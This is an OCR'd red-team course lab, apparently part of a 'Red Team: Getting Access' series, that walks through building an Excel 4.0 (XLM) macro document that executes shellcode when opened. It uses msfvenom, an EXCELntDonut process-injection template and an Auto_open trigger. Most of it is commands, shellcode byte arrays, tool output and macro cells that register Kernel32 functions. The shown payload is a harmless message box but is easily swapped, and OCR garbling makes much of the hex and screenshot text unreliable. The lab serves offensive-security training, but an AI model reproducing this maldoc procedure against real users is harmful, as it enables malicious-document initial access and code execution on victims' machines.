Lab 15: XLM macros, Part 2
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Goals

e Create an Excel spreadsheet that uses an XLM macro to execute shellcode when opened.
e Modify the XLM macro payload to create a less suspicious process tree.

Prerequisites:

e Windows 10 VM with Microsoft Office installed.
e Kali Linux Student VM.

1. Generate an XLM macro with EXCELntDonut:

1. The first step when creating an XLM macro with EXCELntDonut is to generate 32-bit and 64-bit shellcode from
your tool of choice. To keep things relatively simple for this exercise, we'll use Metasploit to generate a payload
that displays a message box. In your Kali Linux VM, open a terminal window and run the command below to
generate the 32-bit shellcode in C# format. The output will be saved as "msgbox-shellcode-32bit.txt".

msfvenom -p windows/messagebox ICON=WARNING TEXT="32-bit Shellcode Executed"
TITLE="Easy Money!' EXITFUNC=thread -f csharp -a x86 -o msgbox-shellcode-
32bit.txt -v shellcode

—(kali® kali)-[~]

L ¢ msfvenom -p windows/messagebox ICON=WARNING TEXT="32-bit Shellcode Execute

d" TITLE='Easy Money!' EXITFUNC=thread -f csharp -a x86 -o msgbox-shellcode-32
bit.txt -v shellcode

[-] No platform was selected, choosing Mst ::Module::Platform:: Windows from the
payload

No encoder specified, outputting raw payload

Payload size: 283 bytes

Final size of csharp file: 1471 bytes

Saved as: msghox-shellcode-32bit.txt

Generating 32-bit Shellcode with Metasploit
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2. Now run the next command to generate 64-bit shellcode and save it as "msgbox-shellcode-64bit.txt".

msfvenom -p windows/x64/messagebox ICON=WARNING TEXT="64-bit Shellcode Executed"
TITLE="Easy Money!' EXITFUNC=thread -f csharp -a x64 -o msgbox-shellcode-
64bit.txt -v shellcode

kali® kali)-[~]

$ msfvenom -p windows/x64/messagebox ICON=WARNING TEXT="64-bit Shellcode Exe
cuted" TITLE='Easy Money!' EXITFUNC=thread -f csharp -a x64 -o msgbox-shellcod

e-b4bit.txt -v shellcode

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the
payload

No encoder specified, outputting raw payload

Payload size: 333 bytes

Final size of csharp file: 1725 bytes

Saved as: msgbox-shellcode-64bit.txt

Generating 64-bit Shellcode with Metasploit

3. Now you each shellcode file you generated needs to be merged with a C# template file used by EXCELntDonut.
Run the command below to create a copy of the "processinjection.cs" template file in your Kali home directory.

cp /opt/EXCELntDonut/templates/processInjection.cs ./

l_—( kali@ ka].i ) - [""]
$ cp /opt/EXCELntDonut/templates/processInjection.cs ./

(kalis kali)-[~]
Ls

Creating a Copy of the "processinjection.cs" Template File

4. Now use a text editor to edit the copy of the processinjection.cs file you just created.

|~ | -I M kali@kali: ~

(¢! )
3 Favorites
G Recently Used

. Terminal Emulator

[
File Manager

o All Applications -
aText Editor

Q, 01 - Information Gathering

% Firefox ESR

i ot T W O | [ 1 W I

Opening the Text Editor Application
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B Mew

Mew Window

New From Template

X Open... e

Open Recent

o Search View Document Help

Untitled 1 - Mousepad

X Save +
s Save As... +Ctri+
Clicking "Open" in the File Menu
o Open File o x
& Recent 1 M kali
Name ~ | Size Type Modified
B Desktop B client-files 11:11
4 Downloads M Desktop 23Feb
B Downloads 10:34
B Documents domains.clean.txt 932 bytes Text 14:52
B Music B domains.csv 2.7kB Text 14:52
first-last-names.txt 118 bytes  Text 15:42
I Pictures _
msgbox-shellcode-32bit.txt 1.5kKB Text 19:16
M Videos msgbox-shellcode-64bit.txt 1.7 kB Text  19:18
rocessinjection.cs
+ Other Locations EE e
B scraper-keywords.csv 495 bytes  Text 15:28
B scraper-linkedin.csv 651 bytes Text 15:28
scraper-zoominfo.csv 0 bytes Text 15:42
Encoding: | Default (UTF-8) A Text Files =
Canne _t Open

Opening the Copy of "processinjection.cs" Stored in the Home Directory
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5. Once you've opened the processinjection.cs file, find the block of 32-bit shellcode inside and replace it with the
shellcode from the "msgbox-shellcode-32bit.txt" file you created with Metasploit.

1byte[] HSIWN<hIERS
pa0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xT4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
EMOxT71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,

x msgbox-shellcode-32bit.txt X

new byte[283] {

//msfvenom -p windows/exec CMD=calc EXITFUNC=thread -f csharp -a x86

shellcode = new byte[189] {
Oxfc, 0<e8 0482 0(00 0{00 0(@0 0(60 0x89,0xe5,0x31,0xcO,0x64,0x8b,0x50,0x30,

process -

o
< Redo

xX Cut

T Copy

Paste Special

B Delete Selection
Delete Line

# Select All

L90x36, Oxdl,Oxff,O0xel,0x60,0x8b,0x6c,0x24,

Ll0x24, Ox01,0xea,0xB8b,0x4a,0x18,0x8b,0x5a,

020, O0x8b,0x01,0xee,0x3]1,0xff,0x31,0xcH,

FROxfc, 0 x0d,0x01,0xc?,0xeb,0xf4,0x3b,0x7c,

M0x24 , B0 xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,

M0x]1c, g0 x589 ,0x44,0x24,0x1c,0x61,0xc3,0xb2,
A0 %08, M0 x8e,0xde,Ox0e,0xec,0x52,0xe8,0x0T,
11 FSiie Oxce,0xel,0x60,0x87,0x1c,0x24,0x52,
IP30xe8, Paste Special Ox68,0x6c,0x6c,0x20,0x41,0x68,0x33,
JER0x32, 8 Delete Selection O 0 x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
I:R0xeb, ) Oxbb,0xa8,0xa2, 0x4d, 0xbc,0x87,0x]1c,
15 (Je  Deleteline S0 65, 0x79,0x21, 0x58,0x68,0x20, 0x4d,
16 KR H Select All MO xdb,0x88,0x5c,0x24,0x0b,0x89,0xe3,
VR0 <68, Ox74,0x65,0x68,0x20,0x45,0x78,0x65,
18 (PG & Convert Ox6c,0x6c,0x68,0x69,0x74,0x20,0x53,
IR ROx68, Move Selection Oxdc,0x24,0x19,0x89,0xel,0x31,0xd2,
g? Ox6a, Duplicate Line / Selection Oxch,0x50,0xff,0x55,0x08 };

Copying the 32-bit Shellcode from "msgbox-shellcode-32bit.txt"
processinjection.cs x

14 if (IntPtr.Size == 4)

15

16 / /%86

,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xTT,
,0xcf,0x0d,0x01,0xc7,0xe2,0xT2,0x52,
,Bxdc,lel,0x?8,0x93,0x48,0x01,0xdl,
,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
,0x01,0xc?,0x38,0xe0,0x75,0xf6,0x03,
,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
,0x04,0x8b,0x01,0xd0,0x89, 0x44,0x24,
,0xeld,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
,0x00,0x00,0x50,0x68,0x31,0x8b,0x6T,
,0x68,0xab,0x95,0xbd, 0x9d, 0xff,0xd5,
,0x05,0xbb, 0x47,0x13,0x72,0x6T,0x6a,
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processinjection.cs X

e

14 if (IntPtr.Size == 4)

15 {

16 //x86

17 //msfvenom -p windows/exec CMD=calc EXITFUNC=thread -f csharp -a x86
18 shellcode =|new byte[283]] {

19 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xT4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
20 0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
21 0x36,0x38,0x47,0x18,0x75,0xT3,0x59,0x01,0xd]l,0xff,0xel,0x60,0x8b,0x6cCc,0x24,
22 0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0xda,0x18,0x8b,0x5a,
23 0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xTf,0x31,0xcO,
24 Oxfc,0xac,0x84,0xc0,0x74,0x07,0xcl,O0xcT,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7cC,
25 0x24,0x28,0x75,0xel,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
26 Ox1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
27 0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0xde,0x0e,0xec,0x52,0xe8,0x97T,
28 Oxff,0xff,0xff,0x89,0x45,0x04,0xbb,0xef,0xce,0xed,0x60,0x87,0x1c,0x24,0x52,
29 OxeB,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0xb6c,0x20,0x41,0x68,0x33,
30 0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
31 Oxeb,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0xd4d,0xbc,0x87,0x1c,
32 0x24,0x52,0xe8,0x5,0xff,0xff,0xff,0x68,0x65,0x79,0x21,0x58,0x68,0x20,0x4d,
33 0x6T,0x6e,0x68,0x45,0x61,0x73,0x79,0x31,0xdb,0x88,0x5¢c,0x24,0x0b,0x89,0xe3,
34 0x68,0x64,0x58,0x20,0x20,0x68,0x63,0x75,0x74,0x65,0x68,0x20,0x45,0x78,0x65,
35 0x68,0x63,0x6T,0x64,0x65,0x68,0x68,0x65,0x6C,0x6c,0x68,0x69,0x74,0x20,0x53,
36 0x68,0x33,0x32,0x2d,0x62,0x31,0xc9,0x88,0x4c,0x24,0x19,0x89,0xel,0x31,0xd2,
37 Ox6a,0x30,0x53,0x51,0x52,0xTT,0xd0,0x31,0xcO,0x50,0xTf,0x55,0x08 };

38

New Shellcode Length Visible in processinjection.cs After Pasting the 32-bit Shellcode
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6. You'll also find a block of 64-bit shellcode inside processinjection.cs after the 32-bit block. Replace it as well,
using the shellcode from "msgbox-shellcode-64bit.txt".

msgbox-shellcode-64bit.txt x

IR CIRgshellcode = new byte[333] {

pROxfc,0x48,0x81,0xed,0xf0,0xTf,O0xFf,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
EM0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
LN0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
LM0x0T,0xb7,0x4da,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xcO,0xac,0x3c,0x61,0x7c,0x02,
R0x2c,0x20,0x41 . ,Oxed,0x52,0x41,0x351,0x3e,
FB0x48,0x8b,0x52 ' ,0xd0,0x3e,0x8b,0x80,0x88,

:J0x00,0x00,0x00 Red ,0xd0,0x50,0x3e,0x8b,0x48,
:t00x18,0x3e,0x44 PR . Ox5c,0x48,0xff,0xc9,0x3e,
pC0x41, 0x8b,0x34 B | 0x48,0x31,0xc0,0xac,0x41,
IR0 xcl, 0xc9, 0x0d MGEeN 0x3e,0xdc,0x03,0x4c,0x24,
IPR0x08, 0x45,0x39 B Paste S - 0x40,0x24,0x49,0x01,0xd0,
JEN0x66,0x3e,0x41 ) ,0x1c,0x49,0x01,0xd0,0x3e,
IC:30x41,0x8b,0x04 Paste Special ,0x58,0x5e,0x59,0x5a,0x41,
IER0x58,0x41,0x59 B DeleteSelection @ Delete ,0x52,0xTT,0xe0,0x58,0x41,
ILR0x59, 0x5a, 0x3e : I , O T T, 0x5d, 0x49,0xc7,0xcl,
17 [FELEMCENC G — Deleteline Rl 000 , 0x00, 0x3e, Ox4c, 0x8d,

I J0x85,0x34,0x01 # Select All (WY, 0x45,0x83,0x56,0x07,0xTT,
,0xbd,0x9d,0xTT,0xd5,0x48,
L0x75,0x05,0xbb,0x47,0x13,
pAROx 72, 0x6T, 0xb6a Move Selection ,0x36,0x34,0x2d,0x62,0x69,
,0x65,0x20,0x45,0x78,0x65,
,0x20,0x4d,0x6T,0x6e,0x65,

Convert

Duplicate Line [ Selection

24 ISCIPEMANY = Increase Indent
= Decrease Indent Ctrl+U

PJ
Ln
1]

Copying the 64-bit Shellcode from "msgbox-shellcode-64bit.txt"

43 //x64
J/msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f csharp -a x64

45 shellcode = new byte[272] {

46 Oxfc,0x48,0x83,0xed,0xf0,0xe8,0xch,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
47 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
48 0x8b,0x5 e N A R L R Qs DAl Dl Oxb7,0x4a,0x4a,0x4d,0x31, 0xc9,
49 0x48,0x3 [SiEa- | 0x20,0x41,0xcl,0xc9,0x0d,0x41,
50 0x01,0xc St p,0x52,0x20,0x8b,0x42,0x3c,0x48,
51 0x01, Oxd( :

52 0xde, 0x5(

53 Oxff,0xc CtrlaC

54 Oxac,0x4

55 0x24,0x04 Ul | 0x8b, 0x40,0x24,0x49,0x01, 0xd@,
56 b » Paste Special ,0x49,0x01,0xd0,0x41,0x8b, 0x04,
57 ) ) - ) B . 059, 0x5a,0x41,0x58,0x41,0x59,
58 > > = = sl ,0xe0,0x58,0x41,0x59, 0x5a, 0x48,
59 ] Delete Line Ehllisa e EIEEE , Oxba, 0x01,0x00,0x00,0x00,0x00,
60 ) ) % Select All PR , 0x00,0x41,0xba,0x31,0x8b,0x6T,
61 Ox87,0xf - N | 0xba,0xab,0x95,0xbd, 0x9d, 0xff,
62 0xd5, 0x44 Convert h,0x80,0xfb,0xeld,0x75,0x05, 0xbb,
63 0x47,0x1 : ,0xda,0xTT,0xd5,0x63,0x61,0x6cC,
61 0x63 . 0x04 Move Selection

65 process = "C: Duplicate Line / Selection

66 } = |ncrease Indent Ctrl+

Pasting the 64-bit Shellcode into processinjection.cs
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processinjection.cs x msgbox-shellcode-32bit.txt x msgbox

40 }

41 else

42 {

43 / /%64

44 f/msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f cshar
45 shellcode = new|byte[333]|{

46 Oxfc,0x48,0x81,0xed,0xf0,0xTT,0xTT,0xTf,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,

47 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
48 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
49 0x0f,0xb7,0x4a,0x4da,0x4d,0x31,0xc9,0x48,0x31,0xcl,0xac,0x3c,0x61,0x7c,0x02,
50 0x2c,0x20,0x41,0xcl,0xc9,0x0d,0x41,0x01,0xcl,0xe2,0xed,0x52,0x41,0x51,0x3e,
51 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
52 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6T,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
53 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xTf,0xc9,0x3e,
54 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
55 0xcl,0xc9,0x0d,0x41,0x01,0xcl,0x38,0xel,0x75,0xfl,0x3e,0xdc,0x03,0xdc,0x24,
56 0x08,0x45,0x39,0xd1l,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
57 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
58 Ox41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
59 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xed,0x58,0x41,
60 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xTf,0x5d,0x49,0xc7,0xcl,
61 0x30,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4d4c,0x8d,
62 0x85,0x34,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
63 0xd5,0xbb,0xel,0x1d,0x2a,0x0a,0x41,0xba,0xab6,0x95,0xbd,0x9d,0xTf,0xd5,0x48,
64 0x83,0xcd,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xed,0x75,0x05,0xbb,0x47,0x13,
65 0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x36,0x34,0x2d,0x62,0x69,
66 Ox74,0x20,0x53,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x45,0x78,0x65,
67 0x63,0x75,0x74,0x65,0x64,0x00,0x45,0x61,0x73,0x79,0x20,0x4d,0x6T,0x6e,0x65,
68 0x79,0x21,0x00 };

69 |

New Shellcode Length Visible in processinjection.cs After Pasting the 64-bit Shellcode

7. Save "processlnjection.cs" when you're done making the two changes to the shellcode.
8. Then run the EXCELntDonut command below to generate an XLM macro from the template file you just
modified.

EXCELntDonut -f processInjection.cs -r System.Windows.Forms.dll -o
~/EXCELntDonut_Output_1.txt

—(kali® kalji)-[~]
L—$ EXCELntDonut -f processlInjection.cs -r System.Windows.Forms.dll -o ~/EXCEL
ntDonut Output 1.txt
s
|

‘_ _ || -\ _ _ _

_| | \_|||!_\'_\

| | — | 1 () | |

| | | I AV SN/ |ZIN
by @JoelLeon]r (@FortyNorthSec)

[i] Generating your x86 .NET assembly.

[i] Generating shellcode from x86 .NET assembly file.

[1] Removing null bytes from x86 shellcode with msfvenom

NV

A
| 7/ N |__
/NN

—F

Execution of EXCELntDonut
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9. It will take a few minutes for EXCELntDonut to generate the XLM macro file. When it's done, you should see a
message like the one below.

[i] Null bytes removed for x64.
[1] Successfully turned your C# file into an XLM macro.

# 1. Open an Excel workbook. #
# 2. Right click to 1nsert a new sheet. #
# Select 'MS Excel 4.0 Macro'. #
# 3. Open your output file in a text editor, #
# copy everything and paste it into Excel. #
# 4. Columns are divided by semi-colons (;) #
# use the Text-to-columns feature in Excel #
# to separate the data into columns. #
# 5. Right click on the first cell of your #
# macro (Al unless using obfuscation). #
# Click 'Run' to make sure the code works. #
# 6. Left click on that same cell. Then, #
# click the drop down right above it that #
# says Al (or whatever the first cell is) #
# and change 1t to 'Auto_open’ #
# 7. Save the file as .xls or .xlsm #

(kali® kali)-[~]
s

XLM Macro Creation Successful

10. The XLM macro has been output to "EXCELntDonut_Output_1.txt" in your Kali user's home directory. To keep
you from having to transfer the file to your Windows VM in the next sections of the exercise, the same payload
has been generated for you in the Lab 15 folder on your Windows 10 desktop.

2. Add the XLM macro to an Excel spreadsheet

1. Inyour Windows 10 VM, open Excel and create a new spreadsheet document. Then insert an MS Excel 4.0
Macro using the same process that was outlined in the last lab exercise.
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2.

Leaving the Excel window open, use Windows Explorer to open the Lab 15 "EXCELntDonut_Output_1.txt" file in

the "Lab exercises" folder on your desktop. When you open the file, you should see a large block of text, similar

to what's shown in the screenshot below.

T JOICK, gLCEsS
Lab 12 - Maldocs, macros in remote templates
[ Desktop - i
Lab 13 - HTML smuggling
* Downloads  # Lab 14 - Maldocs, XLM macros
=| Documents - I Lab 15 - Maldocs, XLM racros part 2 I
[&] Pictures -
e Local Disk ()
J'l Music vl =
4 items
| = | Lab 15 - Maldocs, XLM macros part 2
Home Share View
- R » Lab.. » Lab 13- Maldocs... v 0 2 Search Lab 15 - Ma
(] Mame Date modified
3 Quick access
Completed files 51772021 &:38 PM
[ Desktop -+ .

D EXCELntDonut_[nput_1.cs 2/28/2021 12:25 PM
¥ Downloads  # || EXCELntDonut_lnput_2.cs ¥ 2/28/2021 12:25 PM
Documents EXCELntDonut_Cutput_1 2/28/2021 12:25 PM

p
[=] Pictures + =] EXCELntDonut_Cutput_2 2/28/2021 12:25 PM
Location of the XLM Macro File
| EXCELntDonut_Output_1 - Notepad — O x

File Edit Format View Help

Ln1, Col1

100%

FGOTO(A2) ;=CHAR(235)&CHAR (35 )&CHAR (91)&CHAR (137 ) &CHAR (223 ) &CHAR
(176)&CHAR (218 )&CHAR (252)&CHAR (174 ) &CHAR (117)&CHAR (253 ) &CHAR
(137)&CHAR (249 )&CHAR(137)&CHAR (222 ) &CHAR ( 138) &CHAR (6 ) &CHAR
(48)&CHAR(7)&CHAR(71)&CHAR (102 )&CHAR (129)&CHAR(63)&CHAR( 17 )&CHAR
(248)&CHAR (116 )&CHAR(8)&CHAR(78)&CHAR (128 ) &CHAR (62 ) &CHAR
(218)&CHAR (117 )&CHAR ( 238) &CHAR (235 ) &CHAR ( 234) &CHAR (255 ) &CHAR
(225)&CHAR(232)&CHAR(216)&CHAR (255 ) &CHAR ( 255 ) &CHAR (255 ) &CHAR
(5)&CHAR(7)&CHAR (14 )&CHAR ( 1)&CHAR(1)&CHAR (5 )&CHAR ( 21 )&CHAR
(2)&CHAR(2)&CHAR (6)&CHAR (17)&CHAR ( 7)&CHAR (18)&CHAR (13)&CHAR
(1)&CHAR(8)&CHAR (9)&CHAR (1) &CHAR (14)&CHAR (18)&CHAR (8)&CHAR
(2)&CHAR(1)&CHAR (3)&CHAR (23 )&CHAR(5)&CHAR (2)&CHAR (5)&CHAR (4)&CHAR
(7)&CHAR(11)&CHAR(10)&CHAR(1)&CHAR (10)&CHAR (18)&CHAR (2 )&CHAR
(2)&CHAR(1)&CHAR (6)&CHAR(7)&CHAR (11)&CHAR (8)&CHAR (2)&CHAR (3 ) &CHAR
(9)&CHAR(9)&CHAR (1)&CHAR (18)&CHAR (21)&CHAR(19)&CHAR ( 2) &CHAR
(1)&CHAR(6)&CHAR (6)&CHAR (6 )&CHAR (5 )&CHAR (1) &CHAR (6 )&CHAR (2)&CHAR
(11)&CHAR(2)&CHAR(2)&CHAR (5)&CHAR(11)&CHAR( 7)&CHAR(1)&CHAR
(9)&CHAR(18)&CHAR (6 )&CHAR (7 )&CHAR ( 2) &CHAR (7 )&CHAR (6)&CHAR
(18)&CHAR(22)&CHAR (7)&CHAR (14)&CHAR (218) &CHAR (237 )&CHAR ( 143) &CHAR
(85)&CHAR(1)&CHAR(1)&CHAR (141)&CHAR (78 )&CHAR (2 ) &CHAR(2)&CHAR

Unix (LF)

N

UTF-8

XLM Macro File Opened in Notepad

Red Team: Getting Access
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3. Select all of the text inside the file and copy it to your clipboard.

File | Edit | Format View Help Edit | Format VYiew Help
FGo1 Undo ctrl+z  AR(91)&CHA (AR Unda ST AR (47 ) &CHAF
&CHY J&CHAR(22] | HAR(166)&CH!
V&CH Cut Crl+X 3(124)&CHY (F= Cut S0 S CHAR (226 ) &CH
=GOT Copy Ctri=C  AR(63)&CHA | Copy @ TRl CHAR (61 ) &CH/
I;[(?E Paste Ctrl+V }?[Hﬂﬁ(iSj L= Pascte Ctrl+V H.ﬁR{d?}&CH.ﬂF
&CH 7 J&CHAR( 14 (B85 HAR(166)&CH!
Delet Del :
=GO - © 1)acHAR(2) [ Delete R (226)8CH
R(1¢ Search with Bing... Ctri+E  CHAR(9)&CH PP Search with Bing... (et P CHAR (61 ) &CH/
88)¢ e Ctrl+E I&CI;AR(HE 55= Find.. IR HAR (47 ) &CHAF
=GOT . 231)&CHAR (| |BF _ HAR (166 )&CHZ
saye | Fneies = )acHar(ao) [ FindNext SO (R (226) &CH
(18: Find Previous shift+F3 16)&CHAR({ [FF= Find Previous Shift+F3 = CHﬂR{El:}E{CHﬁ
=601 Replace... Ctr+H  HAR(43)&CH [P Replace... (@ L3 B HAR (47 ) &CHAF
&CH# *GoTo... ctrl+G  TAR(219)&(] [B8S Go To... SR HAR (166 ) &CHE
CHAF (188)&CHAH (= RCHAR (226 )&CH
"_RE Select All Ctrl+ & 1A11oc™™,"| [FEEE Select All Ctrl+A RCHAR (61 ) &CHE
225’ Time/Date F5  &CHAR(121) |FF= Time/Date HAR (47 ) &CHAF
AR( 23 )&UHAR | 18b J&LHAR| 3b J&LHAKR | 157 )&CHAR( Y [P mar; JELHAR (47 )8 J&CHAR(166)&CH!

Copying the XLM Macro Shown in Notepad

4. Then click on cell Al in the Macrol worksheet of your Excel spreadsheet and paste the text into the
spreadsheet.

s b A = % | | B m || R £
| F t as Table ~ -
Paste Font Alignment | Mumber ﬁﬁ ormatas fasie Cells Editing
. |z - v v 57 Cell Styles ~ - .
Clipboard R Styles Analysis Sensitivity
Al & Je
Iy B . C . D . E . F
1 )
2_
3_
4_
5_
6_
?_
8_
9_
10 |
11 |
12 |
13 |
14 |
ol Macrol || Sheeti | )] 1

Pasting the XLM Macro into Cell A1
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5. With the pasted data still selected in the spreadsheet, click on the "Data" tab in the toolbar. Then click on the
"Data Tools" button, and click on "Text to Columns" in the menu that appears.

Bookl - Excel

File Home Insert Page Layout FormLo Data Review View Help 2 17 Share -

(& [& E| A | o . ]
Eap | B2 @ [O7 2L [22 SRR (B

Zl Sort Filter I Data Farecast | Outline
Data~ E5 [2 5 2 | Teols~ v -

Get & Transform Data | Queries & Connecti... Data Types Sort & Filter .

= | —
Al M F || =GOTO[A2);=CHAR(235)&CHAR(35)&CHA (;E Lé] . — E—?‘E'

Iﬁ Text to Data Consalidate
A B c Columns Validation ~

=GOTO(A2);=CHAR(z
=GOTO(A3);=CHAR(4
=GOTO([A4);=CHAR(Z
=GOTO(AS5);=CHAR(S
=GOTO[AG);=CHAR(Z
=REGISTER("Kernel3,
=REGISTER|"Kernel3,

Data Tools

o I T IR S 76 B L T Y

Using the "Text to Columns" Tool

6. Inthe "Convert Text to Columns Wizard" window, make sure that "Delimited" is selected, and then click Next.

Convert Text to Columns Wizard - Step 1 of 3 ? >

The Text Wizard has determined that your data is Delimited.
If this is correct, choose Next, or choose the data type that best describes your data.
Original data type

Choose the file type that best describes your data:
@ - Characters such as commas or tabs separate each field.

i) Fixed width - Fields are aligned in columns with spaces between each field.

Preview of selected data:

O(A2) ;=CHRR (235) &CHAR (35) &CHRR (51) &CHRR (137) &CHRR (223) &CHAR| ™
O{R3) ;=CHAR (45) &CHAR(157) &CHRR (€3 ) &CHRR (225) &CHRR (154} &aCHRR
O(h4) ;=CHRR (2) &CHRR (1) &CHRR (4) &CHAR (2} &CHRR (&) &CHAR (2 ) sCHRR
O(AS) ;=CH2R (5) &CHRR (4) &CHRR (23]1) CHRR (1359) eCHRR (78) eCHRR (5&
O(Ag) ;=CHAR (201) &CHRE (243) &CHARR (43 ) &CHRR (41 ) &CHRR (108) &CHAR | »

L4 >

H

Cancel < Back > Finish

Text to Columns Configuration
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7. InStep 2 of the "Convert Text to Columns Wizard", check the "Semicolon" box, and uncheck all other boxes.
Then click Finish.

[+]:5emicolon:
[ ] comma

[ space

[] other

Convert Text to Celurmns Wizard - Step 2 of 3

Delimiters

[]1ab

Text gualifier:

Data preview

This screen lets you set the delimiters your data contains. You can see how your text is affected
in the preview below,

|:| Treat consecutive delimiters as one

? ot

£

Cancel

0T (R2) FCHRR(235) &CHAR (35) &CHAR(S]) &CHRR (137) &CHRR (223) &CHRR (1] ™
FOTO(A3) PFCHRR (45) &CHRR (157) &CHRR (€3) &CHAE
GOTO(R4) PFCHRR(Z2)&CHAR (1) &CHRR (4) &CHAR (2) &CHRR (&) &CHAR (2) &CHRR (1
=0TO (RS) FCHRR(5) &CHRR (4) &CHRR (231) &CHRR (1359) &CHRR (73) &CHRAR (5€) &
F0TO (Re) FCHRR(201) &CHAR(242) &CHAR(43) &CHAR(41) &CHRR (105 aCHAR (1] w

< Back

{225)eCHRR (154) eCHRR (3

>

Text to Columns Configuration Step 2

8. The datain the Macrol worksheet should now be spread across multiple columns instead of being packed into

Macrn1

column A.

A B C D E F -
1 |=GOTOD(A2) =CHAR(235)&CHAR(: =CHAR(72) &CHAR(4¢
2 | =GOTO(A3) =CHAR(49)&CHAR( 15 =CHAR(72) &CHAR( 14
3 | =GOTO(A4) =CHAR(2)&CHAR(1)& =CHAR(130) &CHAR(¢
4 | =GOTO(AS) =CHAR(9)&CHAR(4)& =CHAR(39) &CHAR(7:
5 | =GOTO(A6) =CHAR(201)&CHAR(Z=CHAR(1)&CHAR(20¢
& | =REGISTER("Kernel3: =CHAR(233)&CHAR([1=CHAR(227) &CHAR|<
7 | =REGISTER("Kernel3, =CHAR(226) &CHAR(1=CHAR(37) &CHAR(1:
& | =REGISTER({"Kernel3; =CHAR(95) &CHAR(4: =CHAR(251) &CHAR(:
9 | =IF(ISNUMBER(SEAR =CHAR(45)&CHAR( 25 =CHAR(75) &CHAR(1:
10) =valloc|0,65536,409¢ =CHAR(37) &CHAR([4( =CHAR(227) &CHAR(<
11| main=5B51 =CHAR(138) &CHAR(S =CHAR(45) &CHAR(1(
12| =SET.VALUE{DL0) =CHAR(113)&CHAR(=CHAR(118)&CHAR(:
13| =WHILE(main<>"exci=CHAR(30) &CHAR(2: =CHAR(170) &CHAR( ¢
14 :SEr.mLUE{Dz,LEN{ —CHAR{dﬁ}&CH,ﬂ.R{L CHAR{I?I}&CHAR{ -

Sheet‘l I+I 1 3

Macro Spread Across Multiple Columns
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9. Test the macro by right-clicking on cell A1, clicking "Run..." in the menu, and then clicking the Run button in the

window that appears.

Al

2

3

4

5 |=GOTO(A6)
6_ =REGISTER("
?_ =REGISTER("
g =REGISTER("
g |=IF(ISNUMB
10 |=Valloc(0,65
11 |main=5B51
12 |=5ET.VALUEI
13 |=WHILE[mai
14 |=5ET.VALUEI

|

Red Team: Getting Access

T Calibri
BI=0-A-i

it
I
i

Jo

]
[

w 11

AN S % 9 E

0 .00
FE {._IIIEI —=0

|=CHARI235) &CHAR(Z =CHAR(72) &CHAR(4¢

Cut

Copy

Paste Options:
CA

Paste Special...
